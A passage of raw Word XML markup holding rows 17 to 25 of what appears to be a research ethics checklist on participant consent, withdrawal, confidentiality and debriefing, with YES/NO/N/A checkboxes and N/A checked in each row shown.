          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1E19200F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44EF9C84" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="37544F37" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="386FD3F6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35235C2F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="4CC205D4" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5C447A70" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A1A0529" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you describe the main research procedures to participants in advance, so that they are informed about what to expect?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="638854427"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6344D401"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1838415725"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="62860998"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="2018272357"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4B2B0740"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1413EA93" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A667F37" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="592B3BB8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you tell participants that their participation is voluntary?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1917978816"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6A9EDA68"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="266745090"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6B2DBC71"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1964613576"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="54A33422"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594BED0B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5B1AC44B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CE9689C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you obtain written consent for participation?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="173071009"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="115EE9B6"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1777214799"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="0138B813"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-2046200750"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="77FA52EB"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349A77C7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="50D1A51F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15B88635" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you explain to participants that refusal to participate in the research will not affect their treatment or education (if relevant)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1907947677"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="630160F7"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1997954874"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="46F1C909"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="833887313"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="44BA27ED"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1793EE35" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="24F1EE7A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70568859" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If the research is observational, will you ask participants for their consent to being observed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-65498961"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="42B9A9DB"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-327907113"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="67B60335"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-843242132"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4CA6017D"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12F92828" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="212619E8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DBCAB07" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you tell participants that they may withdraw from the research at any time and for any reason?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1689744163"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="59FA0BE6"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1160307203"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="68A76705"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-270004211"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="79281D4E"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1412F018" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7B8652E1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B268576" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>With questionnaires, will you give participants the option of omitting questions they do not want to answer?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-120004605"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="3FDAE64B"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-502748247"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4BC1B0C6"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="196125454"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="60A77A7D"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5D602FB8" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="359184AA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A9B2D39" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you tell participants that their data will be treated with full confidentiality and that, if published, it will not be identifiable as theirs?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="96221617"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="1E22B7C7"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-715357891"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="34F11F7E"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-861819308"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2151E238"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3687816E" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E139A95" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="611E1FD1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will you debrief participants at the end of their participation, in a way appropriate to the type of research undertaken?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1507015635"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5BB77F06"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="282701375"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2990EAD0"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1075428902"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="378CFB0A"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3B26FAE7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
